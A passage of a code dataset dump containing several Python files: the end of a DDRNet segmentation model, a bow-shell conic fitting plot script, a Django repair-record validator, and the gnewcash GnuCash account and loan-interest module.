self.spp(self.layer5(self.relu(x))),\n size=[height_output, width_output],\n mode='bilinear',align_corners=False)\n\n x_ = self.final_layer(x + x_)\n\n x_=F.interpolate(x_, size=original_size, mode='bilinear', align_corners=False)\n return x_\n\ndef get_ddrnet_23(num_classes=19):\n model = DualResNet(BasicBlock, [2, 2, 2, 2], num_classes=num_classes, planes=64, spp_planes=128, head_planes=128, augment=False)\n return model\n\ndef get_ddrnet_23slim(num_classes=19):\n model = DualResNet(BasicBlock, [2, 2, 2, 2], num_classes=num_classes, planes=32, spp_planes=128, head_planes=64, augment=False)\n return model\n\nif __name__==\"__main__\":\n model=get_ddrnet_23slim().eval()\n print(model)\n x=torch.randn(1,3,1024,2048)\n y=model(x)\n print(y.shape)\n","sub_path":"22届毕设-遥感图像实时语义分割/RegSeg/competitors_models/DDRNet_Reimplementation.py","file_name":"DDRNet_Reimplementation.py","file_ext":"py","file_size_in_byte":16683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"379278088","text":"import sys\nimport numpy as np\nimport astropy.modeling.fitting\nfrom matplotlib import pyplot as plt\nimport seaborn as sns\nimport equation6\nimport conic_parameters\nimport theta_ratio_fit \nsys.path.append('../conic-projection')\nfrom conproj_utils import Conic\n\nXI_LIST = [None, 1.0, 0.8, 0.4]\nBETA_LIST = [0.1, 0.01, 0.0001]\nnxi, nbeta = len(XI_LIST), len(BETA_LIST)\n\nmethods = {\n 'headtail': 'match head to tail',\n 'gradient': 'match R90 and gradient',\n 'asymptote': 'match R90 and asymptote',\n}\n# Method used to get initial guess at tail parameters It isn't\n# critical how good this is since the fitting will sort things out\n# independently of the starting point\napprox_method = methods['headtail']\n\nntheta = 100\ntheta = np.linspace(0.0, np.pi, ntheta)\n\nfigfilename = sys.argv[0].replace('.py', '.pdf')\n\nsns.set_style('whitegrid')\nsns.set_color_codes('dark')\n\nNROWS = 2\nfig, axes = plt.subplots(nxi, nbeta, sharex=True, sharey=True)\n\nxmin, xmax = -5.0, 2.1\nymin, ymax = -0.1, 7.0\n# xmin, xmax = -7.0, 4.1\n# ymin, ymax = -0.1, 11.0\n\nytop = ymin + 0.98*(ymax - ymin)\nxright = xmin + 0.98*(xmax - xmin)\nwhitebox = {'edgecolor': 'none', 'facecolor': 'white',\n 'alpha': 0.7, 'boxstyle': 'round,pad=0.1'}\n\n\n# x-data for tail asymptote\nxa = np.linspace(xmin, xmax, 2)\n\n# Set up fitter for fitting the tail\nfit = astropy.modeling.fitting.LevMarLSQFitter()\n\nfor j, xi in enumerate(XI_LIST):\n for i, beta in enumerate(BETA_LIST[::-1]):\n ax = axes[j, i]\n\n # The exact solution to the shell\n if xi is None:\n shell = equation6.Shell(innertype='isotropic', beta=beta)\n else:\n shell = equation6.Shell(innertype='anisotropic', beta=beta, xi=xi)\n R, theta1 = shell.radius(theta, full=True)\n ratio = theta1/theta\n R_crw = R/shell.R0\n x_crw = R_crw*np.cos(theta)\n y_crw = R_crw*np.sin(theta)\n\n # Fit to head and approximate guess at fit to tail\n ht = conic_parameters.HeadTail(beta, xi=xi, xmin=0.0, method=approx_method)\n # Convert the tail to the form required for fitting\n model = theta_ratio_fit.hyperbola_ratio(ht.a_t, x0=ht.x0_t,\n tau=np.tan(ht.theta_t), D=ht.D)\n # Freeze the parameters that are external constraints\n model.tau.fixed = True\n model.D.fixed = True\n # Only fit over a certain range of angles\n #mask = (np.degrees(theta) > 100.0) & (np.degrees(theta) < 150.0)\n mask = (np.degrees(theta) > 100.0) & (x_crw > xmin)\n\n # Now do the fit to get an improved tail hyperbola\n best_model = fit(model, theta[mask], ratio[mask])\n\n # Update the tail component of the HeadTail instance\n ht.a_t = best_model.a.value\n ht.x0_t = best_model.x0.value\n\n # And calculate Cartesian arrays for the shapes\n x_head = ht.x_head(ht.t_h)\n y_head = ht.y_head(ht.t_h)\n\n x_tail = ht.x_tail(ht.t_t)\n y_tail = ht.y_tail(ht.t_t)\n\n # asymptote to tail\n ya = (ht.x0_t - xa)*np.tan(ht.theta_t)\n ax.plot(xa, ya, lw=0.3, color='orange')\n\n ax.plot(x_crw, y_crw, lw=4, color='y', alpha=0.7)\n ax.plot(x_head, y_head, '--', color='g')\n ax.plot(x_tail, y_tail, '-', dashes=[8, 4, 2, 4], color='r')\n ax.plot(0.0, 0.0, 'o', color='k')\n ax.plot(ht.x0_t - ht.a_t, 0.0, '.', color='k')\n ax.axhline(ls=':')\n ax.axvline(ls=':')\n ax.set_aspect('equal', adjustable='box-forced')\n\n if xi is None:\n text = r'Isotropic'\n else:\n text = r'Anisotropic, $\\xi = {:.1f}$'.format(xi)\n text += '\\n' + r'$\\beta = {:.4f}$'.format(beta)\n text += ', ' + r'$D = {:.1f}$'.format(ht.D)\n text += '\\n' + r'$x_t = {:.1f}$'.format(ht.x0_t)\n text += ', ' + r'$x_t - a_t = {:.1f}$'.format(ht.x0_t - ht.a_t)\n text += ', ' + r\"$\\theta_t = {:.1f}$\".format(np.degrees(-ht.theta_t))\n text += '\\n' + r'$x_h = {:.1f}$'.format(ht.x0_h)\n text += ', ' + r\"$\\theta_h = {:.1f}$\".format(np.degrees(ht.theta_h))\n ax.text(xright, ytop, text,\n ha='right', va='top', bbox=whitebox, fontsize='small')\n\n# Put axis labels on lower left panel only\naxes[-1, 0].set(\n xlim=[xmin, xmax], ylim=[ymin, ymax],\n xlabel=r'$x / r_{0}$', ylabel=r'$y / r_{0}$',\n)\n\nfig.set_size_inches(3*nbeta, 3*nxi)\nfig.tight_layout()\nfig.savefig(figfilename)\nprint(figfilename)\n","sub_path":"CRW-shapes/conic-head-tail-fit.py","file_name":"conic-head-tail-fit.py","file_ext":"py","file_size_in_byte":4440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"137334669","text":"from retailapp.models import Store\nfrom retailapp.models import Product\nfrom retailapp.models import Repair\nfrom datetime import date\nfrom datetime import datetime\nimport retailapp.models\nimport logging\nfrom retailexcept import ValidationError\nimport json\n\nlogger = logging.getLogger(\"repair\")\n\n\ndef validate_repair(repair_data):\n \"\"\"validate repair\n \"\"\"\n logger.debug('validate_repair repair_data %s', json.dumps(repair_data))\n if \"store\" not in repair_data:\n raise ValidationError(\"Missing store\")\n else:\n store = repair_data[\"store\"]\n store_obj = Store.objects.filter(store_name=store)\n if not store_obj:\n raise ValidationError(\"store %s is invalid\" % store)\n\n if \"product\" not in repair_data:\n raise ValidationError(\"Missing product\")\n else:\n product = repair_data[\"product\"]\n product_obj = Product.objects.filter(prod_name=product)\n if not product_obj:\n raise ValidationError(\"product %s is invalid\" % product)\n\n if \"date\" not in repair_data:\n raise ValidationError(\"Missing date\")\n else:\n date_info = repair_data[\"date\"]\n try:\n datetime.strptime(date_info, '%Y-%m-%d').date()\n except ValueError as ex:\n raise ValidationError(\"date %s is invalid\" % date_info)\n\n if \"cost\" not in repair_data:\n raise ValidationError(\"Missing cost\")\n else:\n if not isinstance(repair_data[\"cost\"], (int, float)):\n raise ValidationError(\"cost %s is invalid\" % repair_data['cost'])\n\n if \"remark\" not in repair_data:\n raise ValidationError(\"Missing remark\")\n\n if \"customer_phone\" not in repair_data:\n raise ValidationError(\"Missing customer_phone\")\n\n if \"customer_name\" not in repair_data:\n raise ValidationError(\"Missing customer_name\")\n\n\ndef get_repair(store, id):\n \"\"\"get repair\n \"\"\"\n logger.debug(\"get_repair begin %s\" % id)\n repair_id = id\n repair = Repair.objects.filter(\n store__store_name=store).filter(id=repair_id)\n if not repair:\n raise ValidationError(\"Can't find repair number %s\" % repair_id)\n \n repair_obj = repair[0]\n repair_data = repair_obj.get_all_data()\n logger.debug(\"repair_data %s\" % repair_data)\n\n return repair_data\n\n\ndef add_new_repair(store, repair_data):\n \"\"\" add new repair\n \"\"\"\n \n validate_repair(repair_data)\n store_obj = Store.objects.get(store_name=repair_data[\"store\"])\n product_obj = Product.objects.get(prod_name=repair_data[\"product\"])\n\n #create object\n repair_obj = Repair()\n repair_obj.store = store_obj\n repair_obj.product = product_obj\n repair_obj.serial = repair_data['serial']\n repair_obj.date = datetime.strptime(repair_data[\"date\"], '%Y-%m-%d').date()\n repair_obj.cost = repair_data['cost']\n repair_obj.remark = repair_data[\"remark\"]\n repair_obj.customer_phone = repair_data[\"customer_phone\"]\n repair_obj.customer_name = repair_data[\"customer_name\"]\n repair_obj.save()\n \n ret = {\"id\": repair_obj.id}\n logger.debug(\"add_new_repair done %s\" % ret)\n return ret\n\n\ndef put_repair(store, id, repair_data):\n \"\"\"put_repair\n \"\"\"\n logger.debug(\"put_repair begin %s\" % id)\n repair_id = id\n repair = Repair.objects.filter(\n store__store_name=store).filter(id=repair_id)\n if not repair:\n raise ValidationError(\"Can't find repair number %s\" % repair_id)\n\n repair_obj = repair[0]\n\n validate_repair(repair_data)\n store_obj = Store.objects.get(store_name=repair_data[\"store\"])\n product_obj = Product.objects.get(prod_name=repair_data[\"product\"])\n\n repair_obj.store = store_obj\n repair_obj.product = product_obj\n repair_obj.serial = repair_data['serial']\n repair_obj.date = datetime.strptime(repair_data[\"date\"], '%Y-%m-%d').date()\n repair_obj.cost = repair_data['cost']\n repair_obj.remark = repair_data[\"remark\"]\n repair_obj.customer_phone = repair_data[\"customer_phone\"]\n repair_obj.customer_name = repair_data[\"customer_name\"]\n repair_obj.save()\n \n ret = {\"id\": repair_obj.id}\n logger.debug(\"put_repair done %s\" % ret)\n return ret\n","sub_path":"retailapp/repair.py","file_name":"repair.py","file_ext":"py","file_size_in_byte":4232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"299442476","text":"\"\"\"\n.. module:: account\n :synopsis:\n.. moduleauthor: Paul Bromwell Jr.\n\"\"\"\nimport re\nfrom datetime import datetime, timedelta\nfrom decimal import Decimal, ROUND_UP\nfrom xml.etree import ElementTree\nfrom collections import namedtuple\n\nfrom gnewcash.commodity import Commodity\nfrom gnewcash.guid_object import GuidObject\nfrom gnewcash.slot import Slot, SlottableObject\n\n\nLoanStatus = namedtuple('LoanStatus', ['iterator_balance', 'iterator_date', 'interest', 'amount_to_capital'])\n\n\nclass AccountType(object):\n \"\"\"\n Enumeration class to indicate the types of accounts available in GnuCash.\n \"\"\"\n ROOT = 'ROOT'\n BANK = 'BANK'\n INCOME = 'INCOME'\n ASSET = 'ASSET'\n CREDIT = 'CREDIT'\n EXPENSE = 'EXPENSE'\n EQUITY = 'EQUITY'\n LIABILITY = 'LIABILITY'\n\n\nclass Account(GuidObject, SlottableObject):\n \"\"\"\n Represents an account in GnuCash.\n \"\"\"\n def __init__(self):\n super(Account, self).__init__()\n self.name = ''\n self.type = None\n self.commodity_scu = None\n self.__parent = None\n self.children = []\n self.commodity = None\n self.code = None\n self.description = None\n\n def __str__(self):\n return '{} - {}'.format(self.name, self.type)\n\n def __repr__(self):\n return str(self)\n\n def __eq__(self, other):\n return self.guid == getattr(other, 'guid', None)\n\n def __hash__(self):\n return hash(self.guid)\n\n def get_starting_balance(self, transactions):\n \"\"\"\n Retrieves the starting balance for the current account, given the list of transactions.\n\n :param transactions: List of transactions or TransactionManager\n :type transactions: list[Transaction] or TransactionManager\n :return: First transaction amount if the account has transactions, otherwise 0.\n :rtype: int or decimal.Decimal\n \"\"\"\n account_transactions = [x for x in transactions if self in [y.account for y in x.splits if y.amount >= 0]]\n if account_transactions:\n first_transaction = account_transactions[0]\n amount = next(filter(lambda x: x.account == self and x.amount >= 0, first_transaction.splits)).amount\n else:\n amount = 0\n return amount\n\n def get_balance_at_date(self, transactions, date=None):\n \"\"\"\n Retrieves the account balance for the current account at a certain date, given the list of transactions.\n If the provided date is None, it will retrieve the ending balance.\n\n :param transactions: List of transactions or TransactionManager\n :type transactions: list[Transaction] or TransactionManager\n :param date: Last date to consider when determining the account balance.\n :type date: datetime.datetime\n :return: Account balance at specified date (or ending balance) or 0, if no applicable transactions were found.\n :rtype: int or decimal.Decimal\n \"\"\"\n balance = 0\n applicable_transactions = [x for x in transactions if self in map(lambda y: y.account, x.splits)]\n\n if date is not None:\n applicable_transactions = filter(lambda x: x.date_posted <= date, applicable_transactions)\n\n for transaction in applicable_transactions:\n if date is None or transaction.date_posted <= date:\n applicable_split = next(filter(lambda x: x.account == self, transaction.splits))\n amount = applicable_split.amount\n if self.type == AccountType.CREDIT:\n amount = amount * -1\n balance += amount\n return balance\n\n def get_ending_balance(self, transactions):\n \"\"\"\n Retrieves the ending balance for the current account, given the list of transactions.\n\n :param transactions: List of transactions or TransactionManager\n :type transactions: list[Transaction] or TransactionManager\n :return: Ending balance if the account has transactions, otherwise 0.\n :rtype: int or decimal.Decimal\n \"\"\"\n return self.get_balance_at_date(transactions)\n\n def minimum_balance_past_date(self, transactions, start_date):\n \"\"\"\n Gets the minimum balance for the account after a certain date, given the list of transactions.\n\n :param transactions: List of transactions or TransactionManager\n :type transactions: list[Transaction] or TransactionManager\n :param start_date: datetime object representing the date you want to find the minimum balance for.\n :type start_date: datetime.datetime\n :return: Tuple containing the minimum balance (element 0) and the date it's at that balance (element 1)\n :rtype: tuple\n \"\"\"\n minimum_balance = None\n minimum_balance_date = None\n iterator_date = start_date\n end_date = max(map(lambda x: x.date_posted, transactions))\n while iterator_date < end_date:\n iterator_date += timedelta(days=1)\n current_balance = self.get_balance_at_date(transactions, iterator_date)\n if minimum_balance is None or current_balance < minimum_balance:\n minimum_balance, minimum_balance_date = current_balance, iterator_date\n if minimum_balance_date and minimum_balance_date > end_date:\n minimum_balance_date = end_date\n return minimum_balance, minimum_balance_date\n\n @property\n def as_xml(self):\n \"\"\"\n Returns the current account configuration (and all of its child accounts) as GnuCash-compatible XML\n\n :return: Current account and children as XML\n :rtype: list[xml.etree.ElementTree.Element]\n :raises: ValueError if no commodity found.\n \"\"\"\n node_and_children = list()\n account_node = ElementTree.Element('gnc:account', {'version': '2.0.0'})\n ElementTree.SubElement(account_node, 'act:name').text = self.name\n ElementTree.SubElement(account_node, 'act:id', {'type': 'guid'}).text = self.guid\n ElementTree.SubElement(account_node, 'act:type').text = self.type\n if self.commodity:\n account_node.append(self.commodity.as_short_xml('act:commodity'))\n else:\n parent_commodity = self.get_parent_commodity()\n if parent_commodity:\n account_node.append(parent_commodity.as_short_xml('act:commodity'))\n\n if self.commodity_scu:\n ElementTree.SubElement(account_node, 'act:commodity-scu').text = str(self.commodity_scu)\n\n if self.code:\n ElementTree.SubElement(account_node, 'act:code').text = str(self.code)\n\n if self.description:\n ElementTree.SubElement(account_node, 'act:description').text = str(self.description)\n\n if self.slots:\n slots_node = ElementTree.SubElement(account_node, 'act:slots')\n for slot in self.slots:\n slots_node.append(slot.as_xml)\n\n if self.parent is not None:\n ElementTree.SubElement(account_node, 'act:parent', {'type': 'guid'}).text = self.parent.guid\n node_and_children.append(account_node)\n\n if self.children:\n for child in self.children:\n node_and_children += child.as_xml\n\n return node_and_children\n\n @classmethod\n def from_xml(cls, account_node, namespaces, account_objects):\n \"\"\"\n Creates an Account object from the GnuCash XML\n\n :param account_node: XML node for the account\n :type account_node: ElementTree.Element\n :param namespaces: XML namespaces for GnuCash elements\n :type namespaces: dict[str, str]\n :param account_objects: Account objects already created from XML (used for assigning parent account)\n :type account_objects: list[Account]\n :return: Account object from XML\n :rtype: Account\n \"\"\"\n\n account_object = cls()\n account_object.guid = account_node.find('act:id', namespaces).text\n account_object.name = account_node.find('act:name', namespaces).text\n account_object.type = account_node.find('act:type', namespaces).text\n\n commodity = account_node.find('act:commodity', namespaces)\n if commodity is not None and commodity.find('cmdty:id', namespaces) is not None:\n account_object.commodity = Commodity.from_xml(commodity, namespaces)\n else:\n account_object.commodity = None\n\n commodity_scu = account_node.find('act:commodity-scu', namespaces)\n if commodity_scu is not None:\n account_object.commodity_scu = commodity_scu.text\n\n slots = account_node.find('act:slots', namespaces)\n if slots is not None:\n for slot in slots.findall('slot', namespaces):\n account_object.slots.append(Slot.from_xml(slot, namespaces))\n\n code = account_node.find('act:code', namespaces)\n if code is not None:\n account_object.code = code.text\n\n description = account_node.find('act:description', namespaces)\n if description is not None:\n account_object.description = description.text\n\n parent = account_node.find('act:parent', namespaces)\n if parent is not None:\n account_object.parent = [x for x in account_objects if x.guid == parent.text][0]\n\n return account_object\n\n def as_dict(self, account_hierarchy=None, path_to_self='/'):\n \"\"\"\n Retrieves the current account hierarchy as a dictionary.\n\n :param account_hierarchy: Existing account hierarchy. If None is provided, assumes a new dictionary.\n :type account_hierarchy: dict\n :param path_to_self: Dictionary key for the current account.\n :type path_to_self: str\n :return: Dictionary containing current account and all subaccounts.\n :rtype: dict\n \"\"\"\n if account_hierarchy is None:\n account_hierarchy = dict()\n account_hierarchy[path_to_self] = self\n for child in self.children:\n if path_to_self != '/':\n account_hierarchy = child.as_dict(account_hierarchy, path_to_self + '/' + child.dict_entry_name)\n else:\n account_hierarchy = child.as_dict(account_hierarchy, path_to_self + child.dict_entry_name)\n return account_hierarchy\n\n @property\n def dict_entry_name(self):\n \"\"\"\n Retrieves the dictionary entry based on account name.\n\n Only alpha-numeric and underscore characters allowed. Spaces and slashes (/) are converted to underscores.\n\n :return: String with the dictionary entry name.\n :rtype: str\n \"\"\"\n non_alphanumeric_underscore = re.compile('[^a-zA-Z0-9_]')\n dict_entry_name = self.name\n dict_entry_name = dict_entry_name.replace(' ', '_')\n dict_entry_name = dict_entry_name.replace('/', '_')\n dict_entry_name = dict_entry_name.lower()\n dict_entry_name = re.sub(non_alphanumeric_underscore, '', dict_entry_name)\n return dict_entry_name\n\n def get_parent_commodity(self):\n \"\"\"\n Retrieves the commodity for the account.\n\n If none is provided, it will look at it's parent (and ancestors recursively) to find it.\n\n :return: Commodity object, or None if no commodity was found in the ancestry chain.\n :rtype: Commodity\n \"\"\"\n if self.commodity:\n return self.commodity\n if self.parent:\n return self.parent.get_parent_commodity()\n return None\n\n def get_subaccount_by_id(self, subaccount_id):\n \"\"\"\n Finds a subaccount by its guid field.\n\n :param subaccount_id: Subaccount guid to find\n :type subaccount_id: str\n :return: Account object for that guid or None if no account was found\n :rtype: Account\n \"\"\"\n if self.guid == subaccount_id:\n return self\n for subaccount in self.children:\n subaccount_result = subaccount.get_subaccount_by_id(subaccount_id)\n if subaccount_result is not None:\n return subaccount_result\n return None\n\n @property\n def parent(self):\n \"\"\"\n Parent account of the current account\n\n :return: Account's parent\n :rtype: Account\n \"\"\"\n return self.__parent\n\n @parent.setter\n def parent(self, value):\n if value is not None:\n if self not in value.children:\n value.children.append(self)\n self.__parent = value\n\n @property\n def color(self):\n \"\"\"\n Account color\n\n :return: Account color as a string\n :rtype: str\n \"\"\"\n return super(Account, self).get_slot_value('color')\n\n @color.setter\n def color(self, value):\n super(Account, self).set_slot_value('color', value, 'string')\n\n @property\n def notes(self):\n \"\"\"\n User defined notes for the account\n\n :return: User-defined notes\n :rtype: str\n \"\"\"\n return super(Account, self).get_slot_value('notes')\n\n @notes.setter\n def notes(self, value):\n super(Account, self).set_slot_value('notes', value, 'string')\n\n @property\n def hidden(self):\n \"\"\"\n Is the account hidden?\n\n :return: True if account is marked hidden, otherwise False.\n :rtype: bool\n \"\"\"\n return super(Account, self).get_slot_value('hidden') == 'true'\n\n @hidden.setter\n def hidden(self, value):\n super(Account, self).set_slot_value_bool('hidden', value, 'string')\n\n @property\n def placeholder(self):\n \"\"\"\n Is the account a placeholder?\n\n :return: True if the account is a placeholder, otherwise False\n :rtype: bool\n \"\"\"\n return super(Account, self).get_slot_value('placeholder')\n\n @placeholder.setter\n def placeholder(self, value):\n super(Account, self).set_slot_value_bool('placeholder', value, 'string')\n\n\nclass BankAccount(Account):\n \"\"\"\n Shortcut class to create an account with the type set to AccountType.BANK\n \"\"\"\n def __init__(self):\n super(BankAccount, self).__init__()\n self.type = AccountType.BANK\n\n\nclass IncomeAccount(Account):\n \"\"\"\n Shortcut class to create an account with the type set to AccountType.INCOME\n \"\"\"\n def __init__(self):\n super(IncomeAccount, self).__init__()\n self.type = AccountType.INCOME\n\n\nclass AssetAccount(Account):\n \"\"\"\n Shortcut class to create an account with the type set to AccountType.ASSET\n \"\"\"\n def __init__(self):\n super(AssetAccount, self).__init__()\n self.type = AccountType.ASSET\n\n\nclass CreditAccount(Account):\n \"\"\"\n Shortcut class to create an account with the type set to AccountType.CREDIT\n \"\"\"\n def __init__(self):\n super(CreditAccount, self).__init__()\n self.type = AccountType.CREDIT\n\n\nclass ExpenseAccount(Account):\n \"\"\"\n Shortcut class to create an account with the type set to AccountType.EXPENSE\n \"\"\"\n def __init__(self):\n super(ExpenseAccount, self).__init__()\n self.type = AccountType.EXPENSE\n\n\nclass EquityAccount(Account):\n \"\"\"\n Shortcut class to create an account with the type set to AccountType.EQUITY\n \"\"\"\n def __init__(self):\n super(EquityAccount, self).__init__()\n self.type = AccountType.EQUITY\n\n\nclass LiabilityAccount(Account):\n \"\"\"\n Shortcut class to create an account with the type set to AccountType.LIABILITY\n \"\"\"\n def __init__(self):\n super(LiabilityAccount, self).__init__()\n self.type = AccountType.LIABILITY\n\n\nclass InterestAccount(object):\n \"\"\"\n Class used to calculate interest balances.\n \"\"\"\n def __init__(self, starting_balance, starting_date, interest_percentage, payment_amount, *,\n additional_payments=None, skip_payment_dates=None, interest_start_date=None,\n subaccounts=None):\n \"\"\"\n Class initializer.\n\n :param starting_balance: Starting balance for the interest account.\n :type starting_balance: decimal.Decimal\n :param starting_date: datetime object indicating the date of the starting balance.\n :type starting_date: datetime.datetime\n :param interest_percentage: Percentage to interest on the loan.\n :type interest_percentage: decimal.Decimal\n :param payment_amount: Payment amount on the loan.\n :type payment_amount: decimal.Decimal\n :param additional_payments: List of dictionaries containing an \"amount\" key for additional amount paid,\n and \"payment_date\" for the date the additional amount was paid.\n :type additional_payments: list[dict]\n :param skip_payment_dates: List of datetime objects that the loan payment should be skipped\n :type skip_payment_dates: list[datetime.datetime]\n :param interest_start_date: datetime object that interest starts on\n :type interest_start_date: datetime.datetime\n :param subaccounts: List of InterestAccount objects that are subaccounts of this InterestAccount\n :type subaccounts: list[InterestAccount]\n \"\"\"\n if additional_payments is None:\n additional_payments = []\n if skip_payment_dates is None:\n skip_payment_dates = []\n self.__starting_balance = Decimal(starting_balance) if starting_balance else None\n self.__starting_date = starting_date\n self.__interest_percentage = Decimal(interest_percentage) if interest_percentage else None\n self.additional_payments = additional_payments\n for payment in additional_payments:\n payment['amount'] = Decimal(payment['amount'])\n self.skip_payment_dates = skip_payment_dates\n self.__payment_amount = Decimal(payment_amount) if payment_amount else None\n self.interest_start_date = interest_start_date\n self.subaccounts = subaccounts\n\n def __str__(self):\n return '{} - {} - {}'.format(self.payment_amount, self.starting_balance, self.interest_percentage)\n\n def __repr__(self):\n return str(self)\n\n @property\n def starting_date(self):\n \"\"\"\n Retrieves the starting date for the account.\n\n If there are subaccounts specified, the minimum starting date of the subaccounts is used.\n\n :return: Minimum starting date, or current InterestAccount's starting date.\n :rtype: datetime.datetime\n \"\"\"\n if self.subaccounts is None:\n return self.__starting_date\n return min([x.starting_date for x in self.subaccounts])\n\n @starting_date.setter\n def starting_date(self, new_starting_date):\n self.__starting_date = new_starting_date\n\n @property\n def interest_percentage(self):\n \"\"\"\n Retrieves the interest percentage for the account.\n\n If there are subaccounts specified, the sum of the subaccounts' interest percentage is used.\n\n :return: Sum of interest percentages, or current InterestAccount object's percentage.\n :rtype: decimal.Decimal\n \"\"\"\n if self.subaccounts is None:\n return self.__interest_percentage\n return sum([x.interest_percentage for x in self.subaccounts])\n\n @property\n def payment_amount(self):\n \"\"\"\n Retrieves the payment amount for the account.\n\n If there are subaccounts specified, the sum of the subaccounts' payment amount is used.\n\n :return: Sum of the payment amounts, or current InterestAccount object's payment amount.\n :rtype: decimal.Decimal\n \"\"\"\n if self.subaccounts is None:\n return self.__payment_amount\n return sum([x.payment_amount for x in self.subaccounts])\n\n @payment_amount.setter\n def payment_amount(self, new_payment_amount):\n self.__payment_amount = new_payment_amount\n\n @interest_percentage.setter\n def interest_percentage(self, new_interest_percentage):\n self.__interest_percentage = new_interest_percentage\n\n @property\n def starting_balance(self):\n \"\"\"\n Retrieves the starting balance for the account.\n\n If there are subaccounts specified, the sum of the subaccounts' starting balance is used.\n\n :return: Sum of the starting balances, or current InterestAccount object's starting balance.\n :rtype: decimal.Decimal\n \"\"\"\n if self.subaccounts is None:\n return self.__starting_balance\n return sum([x.starting_balance for x in self.subaccounts])\n\n @starting_balance.setter\n def starting_balance(self, new_starting_balance):\n self.__starting_balance = new_starting_balance\n\n def get_info_at_date(self, date):\n \"\"\"\n Retrieves the loan info at a specified date for the current account, or all subaccounts (if specified)\n\n :param date: datetime object indicating the date you want the loan status of\n :type date: datetime.datetime\n :return: LoanStatus object\n :rtype: LoanStatus\n \"\"\"\n if self.subaccounts is None:\n return self.__get_info_at_date_single_account(date)\n return self.__get_info_at_date_subaccounts(date)\n\n def __get_info_at_date_single_account(self, date):\n iterator_date = self.starting_date\n iterator_balance = self.starting_balance\n interest_rate = self.interest_percentage\n if interest_rate > 1:\n interest_rate /= 100\n interest = 0\n amount_to_capital = 0\n while iterator_date < date:\n previous_date = iterator_date\n if iterator_date.month == 12:\n iterator_date = datetime(iterator_date.year + 1, 1, iterator_date.day)\n else:\n iterator_date = datetime(iterator_date.year, iterator_date.month + 1, iterator_date.day)\n applicable_extra_payments = [x for x in self.additional_payments\n if previous_date < x['payment_date'] < iterator_date]\n if applicable_extra_payments:\n for extra_payment in applicable_extra_payments:\n iterator_balance -= extra_payment['amount']\n if iterator_date > date:\n break\n if iterator_date in self.skip_payment_dates:\n continue\n\n if self.interest_start_date is None or iterator_date >= self.interest_start_date:\n interest = Decimal(interest_rate / 12 * iterator_balance).quantize(Decimal('.01'), rounding=ROUND_UP)\n amount_to_capital = self.payment_amount - interest\n else:\n interest = 0\n amount_to_capital = self.payment_amount\n new_balance = iterator_balance - amount_to_capital\n if new_balance < 0:\n new_balance = 0\n iterator_balance = new_balance\n\n if iterator_balance == 0:\n break\n\n # Zero out if we're still before the requested date (debt has been fully paid already)\n if iterator_date < date:\n iterator_balance = 0\n iterator_date = date\n interest = 0\n amount_to_capital = 0\n\n return LoanStatus(iterator_balance, iterator_date, interest, amount_to_capital)\n\n def __get_info_at_date_subaccounts(self, date):\n iterator_balance = 0\n iterator_date = None\n interest = 0\n amount_to_capital = 0\n for account in self.subaccounts:\n account_status = account.get_info_at_date(date)\n iterator_balance += account_status.iterator_balance\n iterator_date = account_status.iterator_date\n interest += account_status.interest\n amount_to_capital += account_status.amount_to_capital\n return LoanStatus(iterator_balance, iterator_date, interest, amount_to_capital)\n\n def get_all_payments(self, skip_additional_payments=False):\n \"\"\"\n Retrieves a list of tuples that show all payments for the loan plan.\n\n :param skip_additional_payments: Skips additional payments if True.\n :type skip_additional_payments: bool\n :return: List of tuples with the date (index 0), balance (index 1) and amount to capital (index 2)\n :rtype: list[tuple]\n \"\"\"\n if self.subaccounts is None:\n return self.__get_all_payments_single_account(skip_additional_payments)\n return self.__get_all_payments_subaccounts(skip_additional_payments)\n\n def __get_all_payments_single_account(self, skip_additional_payments=False):\n iterator_date = self.starting_date\n iterator_balance = self.starting_balance\n interest_rate = self.interest_percentage\n payments = list()\n if interest_rate > 1:\n interest_rate /= 100\n while iterator_balance > 0:\n previous_date = iterator_date\n if iterator_date.month == 12:\n iterator_date = datetime(iterator_date.year + 1, 1, iterator_date.day)\n else:\n iterator_date = datetime(iterator_date.year, iterator_date.month + 1, iterator_date.day)\n applicable_extra_payments = [x for x in self.additional_payments\n if previous_date < x['payment_date'] < iterator_date]\n if applicable_extra_payments and not skip_additional_payments:\n for extra_payment in applicable_extra_payments:\n payments.append((extra_payment['payment_date'], iterator_balance, extra_payment['amount']))\n iterator_balance -= extra_payment['amount']\n if iterator_date in self.skip_payment_dates:\n continue\n\n interest = Decimal(interest_rate / 12 * iterator_balance).quantize(Decimal('.01'), rounding=ROUND_UP)\n amount_to_capital = self.payment_amount - interest\n payments.append((iterator_date, iterator_balance, amount_to_capital))\n new_balance = iterator_balance - amount_to_capital\n iterator_balance = new_balance\n return payments\n\n def __get_all_payments_subaccounts(self, skip_additional_payments=False):\n all_payments = []\n for account in self.subaccounts:\n subaccount_payments = account.get_all_payments(skip_additional_payments)\n if not all_payments:\n all_payments = subaccount_payments\n else:\n for index, (payment1, payment2) in enumerate(zip(all_payments, subaccount_payments)):\n all_payments[index] = payment1[0], payment1[1] + payment2[1], payment1[2] + payment2[2]\n return all_payments\n","sub_path":"gnewcash/account.py","file_name":"account.py","file_ext":"py","file_size_in_byte":26587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
